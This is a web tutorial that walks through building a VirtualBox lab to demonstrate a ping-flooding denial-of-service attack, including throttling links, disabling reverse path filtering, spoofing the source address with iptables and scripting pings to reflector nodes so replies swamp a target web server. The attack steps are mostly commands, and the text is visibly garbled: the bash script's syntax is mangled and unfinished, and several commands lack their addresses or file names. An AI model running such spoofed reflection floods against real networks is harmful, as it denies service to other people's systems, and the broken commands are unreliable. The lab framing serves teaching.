Ping flooding – a practical example

Ping flooding - a practical example

Simple but effective denial of service – A DoS attack on a computer network is a ping flooding attack. The idea is that a malicious computer starts sending a large number of ping messages to the target computer. If enough messages have been sent, the connection leading to the target computer is overloaded, thereby disabling normal communication with the target computer.

The goal of ping flooding DoS attacks is to try to overload the link leading to the target so that packets arriving from ordinary users to the target are dropped or substantially delayed. Network congestion is achieved by sending a sufficient amount of data over the link leading to the target so that its full capacity is reached. In the real world, a connection that leads from a network to an Internet service provider (ISP) or a connection that leads to a computer within a LAN is the target of the attack. If that target, which is the target, has a high capacity (more Gb / s), many computers need to be used, which will send data very often to reach the full capacity of that connection. The attacker himself generally does not participate in the attack but initiates a bot attack on the target.

Configuring the network

The network needs to have a malicious computer, a target computer, and several spotlights (computers that a malicious computer can use to attack a target). In this case, we will use the network topology given in the image below.

Since the topic is not topology creation, we will only import it already created as follows:

FILE -> Import appliance -> Choose appliance -> Next -> Import

This topology has eight nodes located in three subnets (nodes 2 and 7 are routers). All IPs start with 192.168., So node1 is Node1 will be a malicious computer, node8 will be a target, and nodes 3, 4, 5 and 6 will act as reflectors. Node3 will also be used as a regular user with a web browser trying to access the webserver (node8).

Deactivation of protection

In our virtual network, we have only a few nodes and in order to overload the connection to the target computer (the connection between the nodes 7 and 8), it is necessary that the capacity of that connection be quite low. VirtualBox emulates network connections but does not set the maximum connection capacity. The speed at which two nodes exchange data varies and depends on several factors: the speed of the host, disk, and driver processors used for the virtual network adapter interfaces, etc. To explicitly adjust the connection capacity between Nodes 7 and 8, we will use the Linux Traffic Control Tool – tc.

Tc is used to emulate connection capacity and packet rejection. Tc affects the output connection and in order to change the connection capacity, in both directions, between nodes 7 and 8, it is necessary to use tc on both nodes. In this case, the connection capacity will be 30,000 bits per second (30 kb / s). This capacity is small enough to allow our attempts to overload the connection with a pair of ping-sending nodes.

For node7 enter:

sudo tc qdisc add dev eth2 root handle 1: 0 htb default 10

sudo tc class add dev eth2 parent 1: 0 classid 1:10 htb rate 30000

For node8 enter:

sudo tc qdisc add dev eth1 root handle 1: 0 htb default 10

sudo tc class add dev eth1 parent 1: 0 classid 1:10 htb rate 30000

The Linux kernel has options that prevent (or make it very difficult) ping flooding attack. To see the attack in action, you need to turn off these security options.

When acting as a router, the Linux kernel does not allow packets originating from one subnet (occurring at a specific interface) and not belonging to that subnet to be forwarded further. This property is called Reverse Path Filtering. It is necessary to disable this option on our network routers (Nodes 2 and 7) by disabling the kernel rp_filter option for both eth1 and eth2 interfaces, as well as for all (all) interfaces.

You also need to reset your network for the options to become active:

For nodes 2 and 7 enter:

sudo sysctl net.ipv4.conf.eth1.rp_filter = 0

sudo sysctl net.ipv4.conf.eth2.rp_filter = 0

sudo sysctl net.ipv4.conf.all.rp_filter = 0

sudo /etc/init.d/networking restart

Attack preparation

A very useful feature in ping flooding attacks is that a malicious node can use a false source address.

For node 1 enter:

sudo iptables -t nat -A POSTROUTING -j SNAT –to-source

We have seen that Linux (and other OS) have a security option that limits the use of ping to broadcast addresses. However, a malicious computer can ping multiple computers to attack. If node1 is malicious, it can ping nodes 3, 4, 5 and 6 at a time, forcing them to send a response to the target computer. To automate ping to multiple computers, we can create a script and run it from node1.

For node 1 enter:

mkdir test

cd test

sudo nano

The file should contain:

! / bin / bash

args = $ #
interval = $ 1
pktsize = $ 2
while true; to
     for ((i = 3; i <= $ args; i ++)); to          ping -i $ interval -s $ pktsize $ 3> / dev / null &

It is also necessary to configure that the file can be executed (granted execution permissions):

sudo chmod + x

The purpose of ping flooding attacks is to deny access to the target by ordinary users. To see the effects of our attack, we will set up an Apache webserver on the target computer (node8) and try to access the Html page from that server.

In order to set up a web server on node8 computer, it must be installed (if not installed) and started (if not already started):

For node 8 enter:

sudo apt-get install apache2

sudo apache2ctl start

We can access the webserver via a node3 computer through a lynx web browser running within the command line.

For node 3 enter:

sudo apt-get install lynx


Node 3 accesses the webserver located at node 8.


In order for node1 to ping multiple computers, it is necessary to run the script. The first two arguments of the script are the ping interval (-and ping command option) and packet size (-s option). The following arguments are the IP addresses of the computers we want to ping. To send 972 bytes of data in each ICMP Echo request at a rate of 5 pings per second to the 3, 4, 5 and 6 nodes.

To launch an attack, on node1 we launch:

./ 0.2 972

If we try again from node3 to access the webserver on node8, we will not be able to connect.

To stop the ping, we have to kill every process. The easiest way is to send an interrupt signal to any process that contains the word ping.

To stop the attack on node1 we launch:

pkill -9 ping

If we want to check packets that pass through a particular node, on that node we run:

sudo apt-get install tcpdump

sudo tcpdump -i eth1

9 0
Article Categories:

Leave a Reply

Your email address will not be published. Required fields are marked *